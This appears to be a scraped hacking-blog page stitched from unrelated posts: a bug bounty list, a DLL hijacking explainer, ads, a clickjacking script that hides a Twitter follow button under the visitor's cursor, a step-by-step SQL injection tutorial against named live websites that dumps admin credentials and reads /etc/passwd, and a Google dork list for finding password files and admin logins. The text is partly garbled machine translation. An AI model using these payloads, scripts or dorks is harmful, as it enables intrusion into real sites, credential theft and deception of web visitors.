Bug Bounty Program List (Earning Money for reporting vulnerabilities)





Bug Bounty Program is a well known issue that handle known companies

 as Google , Facebook , Mozilla , etc., which is based on a payment considerable "Hackers" or

 "Security Research" to find and report any type of vulnerability on their web servers, products,

 services or some associated applications. 


Mostly this program employed by large companies and websites as well as companies who want to

 improve their safety in order to provide better service to their customers, for that matter listare

 the respective information they provide companies with more influence on the network to report

 vulnerabilities that we encounter when we are performing our audits.


BOUNTY BUG IN WEB APPLICATION VULNERABILITIES :


Mozilla

Google

Facebook

Paypal

Etsy

Wordpress

Commonsware

CCBill

Vark

Windthorstisd

BOUNTY BUG VULNERABILITIES IN PRODUCTS:




HALL OF FAME (HALL OF FAME)


Microsoft

Apple

Adobe

IBM

Twitter

Dropbox

Cisco

Moodle
  • http://moodle.org/security

Drupal

Oracle

Symantec

Ebay

Twilio

37 Signals

Salesforce

Reddit

Github

Ifixit

Constant Contact

Zeggio

Simplify

Team Unify

Skoodat

Relaso

Moduscsr

Cloudnetz

Emptrust

Apriva

Amazon

SqaureUp

G-Sec

Xen

Engine Yard

Lastpass

RedHat

Acquia

Mahara


Zynga

Risk.io

Opera 

Owncloud

Scorpion Soft


Norada 

Cpaperless 

Wizehive 

Tuenti

Nokia Siemens

Sound Cloud

Puppetlabs

Neohapsis

HTC

DLL Hijacking: Another way to exploit Windows applications



Concerning the publication of HD Moore (creator of Metasploit) on the implementation of code through DLL Hijacking. Virtually all security blogs have mentioned the subject and already got over 20 exploits Exploit Database for applications such as Power Point, Firefox, Visio, Groove, Winamp, Google Earth, Photoshop and many more! 's it about DLL Hijacking and which affects so many applications? It really is very simple. DLL Hijacking takes advantage of the way it is looking for dynamic libraries (DLL) in the filesystem when a program tries to load using LoadLibrary function. What makes an attacker to create a dynamic library itself, which is equal to call any of the given loading a program when you try to open a certain file type. As at the time of opening the file (eg pps) the working directory is the file, if the attacker plant your library there, the program will load that instead of the original ... Guala! This attack makes sense when we have shared files. Suppose we have a file server based on CIFS (or SMB, the classic Windows shares) where different people can read and write. Now suppose Malicious creates a pps on the server and tells Josesito "look the presentation I put in that directory." Turn, creates a dynamic library Malicious knows that PowerPoint will attempt to load when opening pps. If Josesito not suspicious and curious enough, open the presentation directly from the file server (from experience, everyone does it, nobody copy to your hard things). By doing this, the charge Josesito PowerPoint Seller created by Malicious instead of the original, allowing Malicious run whatever you want with Josesito permits? For playing around, download any of the exploits contained in the Local section Exploit Exploit Database. Many bring the explanation of how to compile the libraries, but tell them they can do it with gcc for Windows as follows:     gcc-shared-o <nombre-libreria-hijack>. <CODE> dll. c then a problem Windows? nop, this time Windows is saved. The problem is that applications do not correctly specify the path to your libraries. As you can see in the manual of the Load Library, it takes as a parameter the name of a library and loads it into memory. If you do not specify path to it, the function performs a standard search, ie it searches the library in default directories. The search order depends on whether "Safe DLL search mode" is active or not. The registry key to enable / disable safe mode is in HKLM \ System \ CurrentControlSet \ Control \ Session Manager \ SafeDllSearchMode (in XP and 2000 SP 4 comes disabled by default). SafeDllSearchMode If enabled, the search order is the follows:     1. The directory where the application is loaded.     2. The system directory.     3. The directory 16-bit system.     4. The Windows directory     6. The directories that are listed in the PATH environment variable. SafeDllSearchMode If disabled, the order is as follows:     1. The directory where the application is loaded.     2. The current directory.     3. The system directory.     4. The directory 16-bit system.     5. The Windows directory     6. The directories that are listed in the PATH environment variable. This standard search order can be altered by using the LoadLibraryEx or with SetDllDirectory, with which specify where to look first. As you will notice, this vulnerability affects any application that does not explicit the path to your libraries, and that is why there must be hundreds or thousands of applications affected. now, if it's so simple, how come nobody discovered it before? Well, if they did, at F-Secure say that this vulnerability was published about 10 years ago, but now came the stir because HD Moore published a kit that allows you to quickly find vulnerable applications. You can read and download the kit Exploiting DLL Hijacking Flaws and Better, Faster, Stronger: DLLHijaAuditKit v2. mentioned While the exploit makes sense from Windows shares, other forms of use is from archives, pen-drives, and WebDav ( extension to HTTP MS IIS). MS published a few days ago an advisory for administrators where they explain some steps to take to minimize the risks. Among the proposed workarounds:     - Disable loading of libraries from WebDAV and remote shares.     - Disable the WebClient service.     - Block the ports 139 and 445 using firewall. Of course this will deprive the shares ... Of course we must be alert to the patches to publish the various suppliers to solve this problem. They also published a guide for programmers on what they can do to protect their applications against DLL Hijacking. Basically the recommendations are:     - Specify the full path to the library whenever possible.     - Using Redirection DLL or manifest to make sure you are using the correct DLL.     - Ensure that "safe DLL search mode" is enabled.     - Delete the current directory search path SetDllDirectory calling function with an empty string ("").     - Do not use the SearchPath function to get the path of a library unless "safe process search mode" is enabled.     - Do not assume version based operating system as returned by LoadLibrary.


Free Proxy List Updated



Free Proxy List Updated 3-7-2012 (7809x)


Proxy List Anonymous surfing is real using our free proxies. Only our proxies are working 100% because they are checking every ONE minute! They are sorted according latency, so come and choose quickest for yourself.



                                    Download now




NEW WORDPRESS PREMIUM THEME Progresso FREE



Progresso has been designed exclusively for those who are looking for an exciting new General/Blog website for WordPress. The easy-to-use theme options are enough to impress alone.Features
Easy to use options pageFeatured Image Ready125x125 banners ready (easy editable from admin options)Compatible with latest WordPress versionsWidgets ReadySEO OptimizedyFixed widthGravatar on CommentsTested and compatible with all major browsers: IE, FF, Safari

                                                    DOWNLOAD



Get thousands of twitter followers FREE!!


Okay make a new website or blog or whatever,
Now use this nifty script,

Make your visitor autofollows your twitter now 

Code:
<iframe class="twitter-follow-button" allowtransparency="true" frameborder="0" scrolling="no"
  src="http://platform.twitter.com/widgets/follow_button.html?screen_name=your_username"
  style="width:75px; height:20px;">
</iframe>

<script>
if (!document.getElementsByClassName){
    document.getElementsByClassName = function(classname){
        for (i=0; i<document.getElementsByTagName("*").length; i++)
        {  
            if (document.getElementsByTagName("*").item(i).className == classname){
                return new Array(document.getElementsByTagName("*").item(i));
            }
        }
    }
}

var twitterFollowIframe = document.getElementsByClassName('twitter-follow-button')[0];
twitterFollowIframe.style.position = 'absolute';
twitterFollowIframe.style.opacity = '0.2';
twitterFollowIframe.style.filter = 'alpha(opacity=20)';
//twitterFollowIframe.style.width = '110px';

/*
// cross domain restriction won't allow this
twitterFollowIframe.onload = function() {
    twitterFollowIframe.contentWindow.scrollTo(20, 0);
}
*/

document.onmousemove = function(e){
    if ( !e ) e = window.event;
    twitterFollowIframe.style.left = e.clientX - 20;
    twitterFollowIframe.style.top = e.clientY - 10;
}
</script>

Add the script after <body> tag in your pages
If you wanna make this transparent then change this one:
Code:

before :
twitterFollowIframe.style.opacity = '0.2';
twitterFollowIframe.style.filter = 'alpha(opacity=20)';

after :
twitterFollowIframe.style.opacity = '0';
twitterFollowIframe.style.filter = 'alpha(opacity=0)';

As his thread says, when someone visits, it autofollows your account! Now go to a traffic exchange like hitleap.com or Empireviews And submit your site!!!! Now everyone autosurfing who views your site will automaticly follow you!!!!!!!!

Sql injection detailed




0x00
*I, the user waive all liability from Enigmagroup.org and its users and admins this lesson is for strict learning purposes only and if I cause damage in any way Enigmagroup.org and its members are not held responsible so do so at your own risk.*
   In this lesson we will be covering the basics of a common SQL injection. We will begin with finding the vulnerability and eventually exploiting it to "hack" the website. There are a few things that you all must know before we begin. first this will be a live action lesson, meaning the sites displayed and used for example are live sites and are not under the control or ownership of anyone related to Enigmagroup. This being said you may opt to either not participate in the examples or load up your proxy and hack away with the rest of us. Secondly there are a few programs that you may choose to use but are not required it only makes the job a little easier. These things being Firefox and the Hackbar addon. So without further ado, letÂ’s get hacking.

0x01

   In the beginning SQL or (structured query language) comes in a few different forms. MYSQL, MSSQL are the most widely used versions but there are others. Today we will focus on MYSQL. The differences in the other versions are mainly syntax and formatting. So in theory once you learn one way it is easy to adapt to the other version simply by changing your injections around a little. SQL is a database computer language designed for managing data in relational database management systems (RDBMS). This being said it is simply a means of extracting information from a database. For example, if we had a collection of books all from different authors. But we only want to view the ones from the author "Tolkien" a simple query would look like this
SELECT Title FROM Books WHERE Author = "Tolkien"
This would display exactly what it says all the books that are written by Tolkien in our current list of books. This is the premise for exploiting the vulnerability in the language.

0x02
   
   SQL vulnerabilities occur when a programmer allows the input of escape characters in which allows arbitrary code to be executed. A programmer whom does not sanitize their user inputs is asking to be hacked. By sanitize I mean he/she does not filter what the user is allowed to input and communicate to the server with. For example if the user does not filter out the <>'s characters then they could easily be susceptible to XSS injections but that is for another lesson. The main solution here is to learn to sanitize all user inputs. NEVER trust an end user to input the proper information; always check them with some form of validation.

0x03

   Things you should know are the main comment characters used within MYsql statements. These are as follows --, /*, # these are much like any other comment characters in programming languages it allows what follows to not be executed and is mainly for the programmer to explain or comment on the code written either telling them how it works or what parameters are needed etcetc. Next we need to identify the parameters available for a SQL attack. The main things associated with sql injections are the parameters normally given to php or asp or some other language but we will focus on PHP. A parameter like the following
http://www.blah.com/index.php?id=1 is a prime example of a common sql injection starting point. Granted there are TONS of things the programmer can call their parameters but the most used are things like id, category_id, news_item etcetc basically anything you can think of could be vulnerable. Normally the injection takes place in the news or image gallery sections of a website. The news is probably the #1 section that is vulnerable so we will use this for an example. When you see a site with the parameters news.php?id=1 then this is a great spot to try your injection. First i always check to see if anything happens when simply placing a ' after the 1 like  news.php?id=1' this should cause an error if the query is not properly sanitized. Further attack methods are ' and 1=1--, ‘  and 1=2-- or some other variant. Notice the comment character after your initial injection. This is to comment out the rest of the query and only injection your part which would do two things. ' and 1=1-- will always return true. Which means the page should load normally, but ' and 1=2-- should cause another error or some other kind of thing like for instance the page not being displayed properly. There are cases where you do not get to see these error and things but that is for an advanced lesson. Also take note that 1=1 or 1=2 does not have to be those numbers you could use anything that would return true such as 'a'='a' you would have to add the 's to make sure it passes to through the statement.

0x04

   Now letÂ’s move on to the fun stuff. We have already been given the amount of information that will help us on our journey into the SQL attack. So letÂ’s start with a LIVE site to test our skills.

**** REMEBER THIS IS A REAL SITE TAKE PRECAUTIONS OR DO NOT PARTICIPATE IF YOU DONT WISH TO ****

http://www.itmaasia.com

First we need to do some recon to find our injection point can anyone find the spot we should use to do our injection? The news parameter looks like a good candidate.

http://www.itmaasia.com/news.php?id=1
This is asking the database for all records with the id of 1 to be displayed
Now its time to check if its vulnerable or not. And how do we start doing that ?? with a ' of course. :-)

http://www.itmaasia.com/news.php?id=1'
This gives an error in SQL errors are your bestest friend.

Further investigation to see if the query gets executed you could use
http://www.itmaasia.com/news.php?id=1 and 1=1--
This should load the site like regular change it to
http://www.itmaasia.com/news.php?id=1 and 1=2--
Should give an error or a blank page or something along that nature anything that does not load like the page unmodified.
The AND is an operator meaning show all the pages with id = 1 AND if 1=1-- which it does so it returns true and contrary wise.

So now we know the page is vulnerable. Next lets go on to figuring out how many columns the page has.
Using the ORDER BY command allows us to step into the query to check to see how many columns it has.
http://www.itmaasia.com/news.php?id=1 order by 1--
This is where Hackbar comes in handy
use the load URL button to load the url into hackbar. Now select the 1 at the end of the query and use the + icon to increase the number to 2 repeat this process until an error has occurred.
http://www.itmaasia.com/news.php?id=1 order by 2--
http://www.itmaasia.com/news.php?id=1 order by 3--
and so on using this method the amount BEFORE the error is how many columns it has not the number that causes the error. so if it errors at "order by 28--" then the amount of columns is 27.
Also something that may be a little advanced is multiple errors sometimes. I Always use
"order by 9999—“ first because unless the site has 9999 columns which would be unheard of then this is your true error. Which means any other errors you get while searching that are not identical to this error are false positives. 
So have we found the amount of columns yet?

http://www.itmaasia.com/news.php?id=1 order by 28--
this causes our first "Unknown column" error
so the proper amount of columns is 27
So next we need to set up our UNION statement.

0x05

   The UNION operator is Nothing more than a way to ask for more than 1 query at the same time. In essence this is the command after the first command. The use of ALL with UNION allows the return of ALL records matching if this is not used then the UNION  will only return distinct results meaning it does not return duplicate values if any exist. we shall use "UNION ALL". Now when using UNION operators you must also use the SELECT statement because we are selecting data from the database. This being said we should now be up to
http://www.itmaasia.com/news.php?id=1 UNION ALL SELECT --
To make this work to our benefit first we will want to only display our results. Meaning we do not want to see what is on the page with ID =1. So we need only select a valid result that is not included in the database. Like for instance -1 or again 9999 which in this case could be used in LARGE databases or you could also use NULL. Now NULL normally shouldnt exist so lets use that.
http://www.itmaasia.com/news.php?id=NULL UNION ALL SELECT --
Now this will only return our data as long as null is not a result Granted this is not a complete injection its only a projection of where we are at.
Next is where our hard work pays off remember that Magical column number we found this is where we use it to use the union all select we will need to specify our amount of columns. If the original query was selecting 4 columns then it would be easier LOL BUT, this is where hackbar comes in handy again. With the URL loaded in hackbar you can use the sql icon to add a union select statement. then "rewrite" if necessary to look something like this

http://www.itmaasia.com/news.php?id=NULL UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27--

Now With this command we get our FIRST glance at what the site is pulling from the database. We should see two things on this page

HOME >> Exhibitors List >> 3
11

Now what this tells us is that its pulling data from the database and displaying it in COLUMNS 3 and 11. That means for us to "SEE" the output of our query we are gonna have to use one of those columns to display it back to us. Column 3 would be probably the title of the news item and 11 would more than likely be the info that goes along with it for argument sake anyway. So taking this into consideration lets do some explaining. The column numbers are not actually numbers at all the 1,2,3,4 are more or less place holders. The , is the real column so dont forget your commas thats what the sql is looking for, whats between them dont really matter. Some times in certain injection you may get an error with data type mismatching There are ways around that that may. By using the cast() function you could change the fact that column 2 only allows to display a string so you could use the CAST(3 as nvarchar) function instead of the 3 in your injection and it would allow it to be displayed you can also use '3' in place of the 3 to accomplish the same thing.

To prove a point I will touch on the CHAR() function now
The Char() function interprets each value as an integer and returns a string based on the given characters by the code values of those integers. Lets go back to hackbar for an example highlight the number 3 in your injection and select the sql icon -> MYSQL ->MYSQL CHAR() and the injection Changes to this
http://www.itmaasia.com/news.php?id=NULL UNION ALL SELECT 1,2,CHAR(51),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27--
now to us it has not really changed. now try using this instead
http://www.itmaasia.com/news.php?id=NULL UNION ALL SELECT 1,2,CHAR(83, 89, 78),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27--
now notice anything different? :-)
This can come in handy later.
Anyway.

0x06

   Now that we have achieved our goal so far we will need to complete a few more steps to officially "HACK" this site. Now we have to get some data from the database. We need to gather information from the server about itself, this can easily be accomplished with a few basic questions.
The things we need to know are the user(), version(), and database().  we can do it a few different ways.

http://www.itmaasia.com/news.php?id=-1 UNION ALL SELECT 1,2,user(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27-- 
This displays
citme_wanhu@localhost
which is the user @localhost
we could also accomplish it if we put it in the 11 column
http://www.itmaasia.com/news.php?id=-1 UNION ALL SELECT 1,2,user(),4,5,6,7,8,9,10,user(),12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27-- 
I like the 11 column because it is displayed by itself so lets use that one from now on.
http://www.itmaasia.com/news.php?id=-1 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,user(),12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27-- 
we could change user() with version() and database() and do it that way or we could use our friend concat()
This allows you to combine to requests into the same column.
http://www.itmaasia.com/news.php?id=-1 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,concat(user(),version(),database()),12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27-- 
This displays
citme_wanhu@localhost5.1.33-communityexhibition
now to me thats jumbled so lets add some "FLAIR" to our injection through the usage of HEX values.
concat(user(),0x3a,database(),0x3a,version()) this is basic the 0x3a is the hex value of the : character. to start using hex in the sql statement you must preceded it with 0x so a little more advanced would be
concat(user(),0x203a20,database(),0x203a20,version()) this will pad the : with spaces on each side because 0x20 is the hex value for the space character.
now here is a more advanced injection
concat(0x7c20526573756c74733a20,0x56657273696f6e3a20,version(),0x3a20,0x44617461626173653a20,database(),0x3a20,0x557365723a20,user(),0x207c,0x2020203a3a3a205073696265725f53796e203a3a3a)
try that and see what you get :-)

now depending on the version you have a new path to choose.
it the version returns 4 something then the information_schema is not available so you will have to guess or use another method for the getting the tablenames. This will not be covered.
Now if it returns version 5 we are relieved cause it makes it that much easier. INFORMATION_SCHEMA is a database that contains the information about the current users database. For instance it contains all the table_names and column_names that the current user has created. It also hold a lot of other data like privileges, triggers, character_sets etcetc. The schema also has different "chapters to it" information_schema.tables is all the table information likewise information_schema.columns holds the column information and so on. so the things we need to hack this site are the column names and the table names mainly. we are not going into multiple databases here this time.
http://www.itmaasia.com/news.php?id=-1 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,table_name,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 FROM INFORMATION_SCHEMA.TABLES--
would begin to display the tablenames contained in the database.
to go through them you would use the limit function like
http://www.itmaasia.com/news.php?id=-1 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,table_name,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 FROM INFORMATION_SCHEMA.TABLES limit 0,1--
changing the 0 to 1 lets you step through the table_names
http://www.itmaasia.com/news.php?id=-1 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,table_name,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 FROM INFORMATION_SCHEMA.TABLES limit 74,1-- would be the last table-name as anything further and it gives a blank page or errors.
normally when you reach the lowercase table_names youve hit the user created tables.
http://www.itmaasia.com/news.php?id=-1 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,table_name,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 FROM INFORMATION_SCHEMA.TABLES limit 28,1-- starts the user created table list. we see some good ones in there tb_admin, user, members etcetc. lets just focus on the admin
http://www.itmaasia.com/news.php?id=-1 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,table_name,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 FROM INFORMATION_SCHEMA.TABLES limit 31,1--
now there are a few ways to do this next step also just this is what works for me 90% of the time.
by changing the "chapter" in the info_schema you can see the column names just like the table names

http://www.itmaasia.com/news.php?id=-1 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,concat(0x5461626c65204e616d653a20,table_name,0x2020436f6c756d6e204e616d653a20,column_name),12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 FROM INFORMATION_SCHEMA.columns limit 338,1--
notice i added the concat and fancied it up a bit and left in tablename that way i dont get lost cause as you can see there are hundreds of records to sort through at limit 338 here we begin in the tb_admin table
admin_id
username
password
these are the columns we mainly care about. As you can see this user put a great deal amount of thinking into naming his columns here he is asking to get hacked to me.
Before I move on I also want to explain the Group_concat() method
It does much the same as a regular concat but if there is more than just one item like we have here then you would have to use limits to step through the individual tables and columns. Well im lazy and this takes time :-P enter group_concat()
Using the same injection
http://www.itmaasia.com/news.php?id=-1 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,table_name,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 FROM INFORMATION_SCHEMA.TABLES—
we want to skip the whole limiting part and just see the entire list
http://www.itmaasia.com/news.php?id=-1 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,group_concat(table_name),12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 FROM INFORMATION_SCHEMA.TABLES—
as you see this will begin listing all the table names one after another BUT when it gets to the side it cuts off the rest what are we gonna do?? Using our new found knowledge of hex values we will insert a new line character
news.php?id=-1 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,group_concat(table_name,0x0d0a),12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 FROM INFORMATION_SCHEMA.TABLES--
0x0d0a is the hex values for \r\n or <br> so now we get the entire list in a nice readable fashion. Quick fast and to the point. Now there are times where this will not work properly and you would have to use the limit technique so donÂ’t forget what you have learned.




0x07

   Since we now know the amount of columns, table name, and column name the site is pretty much owned. with the use of this injection you will see your results
http://www.itmaasia.com/news.php?id=-1 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,concat(0x61646d696e5f69643a20,admin_id,0x20757365726e616d653a20,username,0x2070617373776f72643a20, password),12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 FROM tb_admin --

0x08

Now just crack the password hash and thats it. the site is theoretically yours.
ONLY ONE OTHER THING. finding the admin panel or login spots now that will have to be up to you there is no easy way to find these you would have to check all the known admin directories or just guess. This information will not be included. Sorry your on your own.

0x09

   A short explanation of the load_file() function
**** ALSO A LiVE SITE SO BEWARE ****
http://photos.surfline.com/view_image.php?pid=-1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,LOAD_FILE(0x2f6574632f706173737764),17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33--

this site looks much like any other injection except that we are using the load_file() function
LOAD_FILE(0x2f6574632f706173737764)
this does what it looks like it loads a file from their server into the injection. you will more than likely have to use hex or char or something to use loadfile the one there loads the /etc/passwd file from the site. there are also others that you could load for example the httpd.conf which is located at 
/etc/httpd/conf/httpd.conf or in hex 0x2f6574632f68747470642f636f6e662f68747470642e636f6e66 there are others that would help you tremendously such as poisoning logs to put up a shell or viewing the admin login page theres tons of things you can view essentially every file on the server accessible. But these methods are for a later lesson.


0x10

   In conclusion i hope that we all learned something and i have shed some light on to the world of sql injections and hacking in general. I would like to thank Enigmgroup for their patience and expertise and i would like to thank the many users who visit the site religiously.

*** The author Psiber_Syn nor Enigmagroup can be held responsible with any and all information contained herein you must accept your own responsibilities this was just an example proof-of-concept ***

Media Fire clone is for sale


           If  you are interested in buying the mediafire clone please contact me 



                          ashokchakravarthy1@gmail.com

Google hacking master list


Code: 

admin account info" filetype:log 
!Host=*.* intext:enc_UserPassword=* ext:pcf 
"# -FrontPage-" ext:pwd inurl:(service | authors | administrators | users) "# -FrontPage-" inurl:service.pwd 
"AutoCreate=TRUE password=*" 
"http://*:*@www" domainname 
"index of/" "ws_ftp.ini" "parent directory" 
"liveice configuration file" ext:cfg -site:sourceforge.net 
"parent directory" +proftpdpasswd 
Duclassified" -site:duware.com "DUware All Rights reserved" 
duclassmate" -site:duware.com 
Dudirectory" -site:duware.com 
dudownload" -site:duware.com 
Elite Forum Version *.*" 
Link Department" 
"sets mode: +k" 
"your password is" filetype:log 
DUpaypal" -site:duware.com 
allinurl: admin mdb 
auth_user_file.txt 
config.php 
eggdrop filetype:user user 
enable password | secret "current configuration" -intext:the 
etc (index.of) 
ext:asa | ext:bak intext:uid intext:pwd -"uid..pwd" database | server | dsn 
ext:inc "pwd=" "UID=" 
ext:ini eudora.ini 
ext:ini Version=4.0.0.4 password 
ext:passwd -intext:the -sample -example 
ext:txt inurl:unattend.txt 
ext:yml database inurl:config 
filetype:bak createobject sa 
filetype:bak inurl:"htaccess|passwd|shadow|htusers" 
filetype:cfg mrtg "target 
filetype:cfm "cfapplication name" password 
filetype:conf oekakibbs 
filetype:conf slapd.conf 
filetype:config config intext:appSettings "User ID" 
filetype:dat "password.dat" 
filetype:dat inurl:Sites.dat 
filetype:dat wand.dat 
filetype:inc dbconn 
filetype:inc intext:mysql_connect 
filetype:inc mysql_connect OR mysql_pconnect 
filetype:inf sysprep 
filetype:ini inurl:"serv-u.ini" 
filetype:ini inurl:flashFXP.ini 
filetype:ini ServUDaemon 
filetype:ini wcx_ftp 
filetype:ini ws_ftp pwd 
filetype:ldb admin 
filetype:log "See `ipsec --copyright" 
filetype:log inurl:"password.log" 
filetype:mdb inurl:users.mdb 
filetype:mdb wwforum 
filetype:netrc password 
filetype:pass pass intext:userid 
filetype:pem intext:private 
filetype:properties inurl:db intext:password 
filetype:pwd service 
filetype:pwl pwl 
filetype:reg reg +intext:"defaultusername" +intext:"defaultpassword" 
filetype:reg reg +intext:â? WINVNC3â? 
filetype:reg reg HKEY_CURRENT_USER SSHHOSTKEYS 
filetype:sql "insert into" (pass|passwd|password) 
filetype:sql ("values * MD5" | "values * password" | "values * encrypt") 
filetype:sql +"IDENTIFIED BY" -cvs 
filetype:sql password 
filetype:url +inurl:"ftp://" +inurl:";@" 
filetype:xls username password email 
htpasswd 
htpasswd / htgroup 
htpasswd / htpasswd.bak 
intext:"enable password 7" 
intext:"enable secret 5 $" 
intext:"EZGuestbook" 
intext:"Web Wiz Journal" 
intitle:"index of" intext:connect.inc 
intitle:"index of" intext:globals.inc 
intitle:"Index of" passwords modified 
intitle:"Index of" sc_serv.conf sc_serv content 
intitle:"phpinfo()" +"mysql.default_password" +"Zend s?ri?ting Language Engine" 
intitle:dupics inurl:(add.asp | default.asp | view.asp | voting.asp) -site:duware.com 
intitle:index.of administrators.pwd 
intitle:Index.of etc shadow 
intitle:index.of intext:"secring.skr"|"secring.pgp"|"secring.bak" 
intitle:rapidshare intext:login 
inurl:"calendars?ri?t/users.txt" 
inurl:"editor/list.asp" | inurl:"database_editor.asp" | inurl:"login.asa" "are set" 
inurl:"GRC.DAT" intext:"password" 
inurl:"Sites.dat"+"PASS=" 
inurl:"slapd.conf" intext:"credentials" -manpage -"Manual Page" -man: -sample 
inurl:"slapd.conf" intext:"rootpw" -manpage -"Manual Page" -man: -sample 
inurl:"wvdial.conf" intext:"password" 
inurl:/db/main.mdb 
inurl:/wwwboard 
inurl:/yabb/Members/Admin.dat 
inurl:ccbill filetype:log 
inurl:cgi-bin inurl:calendar.cfg 
inurl:chap-secrets -cvs 
inurl:config.php dbuname dbpass 
inurl:filezilla.xml -cvs 
inurl:lilo.conf filetype:conf password -tatercounter2000 -bootpwd -man 
inurl:nuke filetype:sql 
inurl:ospfd.conf intext:password -sample -test -tutorial -download 
inurl:pap-secrets -cvs 
inurl:pass.dat 
inurl:perform filetype:ini 
inurl:perform.ini filetype:ini 
inurl:secring ext:skr | ext:pgp | ext:bak 
inurl:server.cfg rcon password 
inurl:ventrilo_srv.ini adminpassword 
inurl:vtund.conf intext:pass -cvs 
inurl:zebra.conf intext:password -sample -test -tutorial -download 
LeapFTP intitle:"index.of./" sites.ini modified 
master.passwd 
mysql history files 
NickServ registration passwords 
passlist 
passlist.txt (a better way) 
passwd 
passwd / etc (reliable) 
people.lst 
psyBNC config files 
pwd.db 
server-dbs "intitle:index of" 
signin filetype:url 
spwd.db / passwd 
trillian.ini 
wwwboard WebAdmin inurl:passwd.txt wwwboard|webadmin 
[WFClient] Password= filetype:ica 
intitle:"remote assessment" OpenAanval Console 
intitle:opengroupware.org "resistance is obsolete" "Report Bugs" "Username" "password"
"bp blog admin" intitle:login | intitle:admin -site:johnny.ihackstuff.com 
"Emergisoft web applications are a part of our" 
"Establishing a secure Integrated Lights Out session with" OR intitle:"Data Frame - Browser not HTTP 1.1 compatible" OR intitle:"HP Integrated Lights- 
"HostingAccelerator" intitle:"login" +"Username" -"news" -demo 
"iCONECT 4.1 :: Login" 
"IMail Server Web Messaging" intitle:login 
"inspanel" intitle:"login" -"cannot" "Login ID" -site:inspediumsoft.com 
"intitle:3300 Integrated Communications Platform" inurl:main.htm 
"Login - Sun Cobalt RaQ" 
"login prompt" inurl:GM.cgi 
"Login to Usermin" inurl:20000 
"Microsoft CRM : Unsupported Browser Version" 
"OPENSRS Domain Management" inurl:manage.cgi 
"pcANYWHERE EXPRESS Java Client" 
"Please authenticate yourself to get access to the management interface" 
"please log in" 
"Please login with admin pass" -"leak" -sourceforge 
CuteNews" "2003..2005 CutePHP" 
DWMail" password intitle:dwmail 
Merak Mail Server Software" -.gov -.mil -.edu -site:merakmailserver.com 
Midmart Messageboard" "Administrator Login" 
Monster Top List" MTL numrange:200- 
UebiMiau" -site:sourceforge.net 
"site info for" "Enter Admin Password" 
"SquirrelMail version" "By the SquirrelMail development Team" 
"SysCP - login" 
"This is a restricted Access Server" "Javas?ri?t Not Enabled!"|"Messenger Express" -edu -ac 
"This section is for Administrators only. If you are an administrator then please" 
"ttawlogin.cgi/?action=" 
"VHCS Pro ver" -demo 
"VNC Desktop" inurl:5800 
"Web-Based Management" "Please input password to login" -inurl:johnny.ihackstuff.com 
"WebExplorer Server - Login" "Welcome to WebExplorer Server" 
"WebSTAR Mail - Please Log In" 
"You have requested access to a restricted area of our website. Please authenticate yourself to continue." 
"You have requested to access the management functions" -.edu 
(intitle:"Please login - Forums 
UBB.threads")|(inurl:login.php "ubb") 
(intitle:"Please login - Forums 
WWWThreads")|(inurl:"wwwthreads/login.php")|(inurl:"wwwthreads/login.pl?Cat=") 
(intitle:"rymo Login")|(intext:"Welcome to rymo") -family 
(intitle:"WmSC e-Cart Administration")|(intitle:"WebMyStyle e-Cart Administration") 
(inurl:"ars/cgi-bin/arweb?O=0" | inurl:arweb.jsp) -site:remedy.com -site:mil 
4images Administration Control Panel 
allintitle:"Welcome to the Cyclades" 
allinurl:"exchange/logon.asp" 
allinurl:wps/portal/ login 
ASP.login_aspx "ASP.NET_SessionId" 
CGI:IRC Login 
ext:cgi intitle:"control panel" "enter your owner password to continue!" 
ez Publish administration 
filetype:php inurl:"webeditor.php" 
filetype:pl "Download: SuSE Linux Openexchange Server CA" 
filetype:r2w r2w 
intext:""BiTBOARD v2.0" BiTSHiFTERS Bulletin Board" 
intext:"Fill out the form below completely to change your password and user name. If new username is left blank, your old one will be assumed." -edu 
intext:"Mail admins login here to administrate your domain." 
intext:"Master Account" "Domain Name" "Password" inurl:/cgi-bin/qmailadmin 
intext:"Master Account" "Domain Name" "Password" inurl:/cgi-bin/qmailadmin 
intext:"Storage Management Server for" intitle:"Server Administration" 
intext:"Welcome to" inurl:"cp" intitle:"H-SPHERE" inurl:"begin.html" -Fee 
intext:"vbulletin" inurl:admincp 
intitle:"*- HP WBEM Login" | "You are being prompted to provide login account information for *" | "Please provide the information requested and press 
intitle:"Admin Login" "admin login" "blogware" 
intitle:"Admin login" "Web Site Administration" "Copyright" 
intitle:"AlternC Desktop" 
intitle:"Athens Authentication Point" 
intitle:"b2evo > Login form" "Login form. You must log in! You will have to accept cookies in order to log in" -demo -site:b2evolution.net 
